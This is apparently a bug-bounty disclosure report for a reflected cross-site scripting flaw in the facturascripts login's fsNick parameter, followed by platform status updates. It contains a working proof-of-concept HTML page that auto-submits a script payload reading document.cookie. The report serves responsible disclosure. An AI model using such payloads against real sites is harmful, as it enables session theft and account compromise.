Refelect XSS in facturascripts in neorazorx/facturascripts
Valid
Reported on
Apr 27th 2022
Description
facturascripts is vulnerable to XSS in fsNick parameter
Proof of Concept
save this code as poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/" method="POST">
<input type="hidden" name="fsNick" value="1'"()&%<acx><ScRiPt >alert(document.cookie)</ScRiPt>" />
<input type="hidden" name="fsPassword" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
open file with your browser -> xss trigger
Impact
This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.
We are processing your report and will contact the
neorazorx/facturascripts
team within 24 hours.
a year ago
We have contacted a member of the
neorazorx/facturascripts
team and are waiting to hear back
a year ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation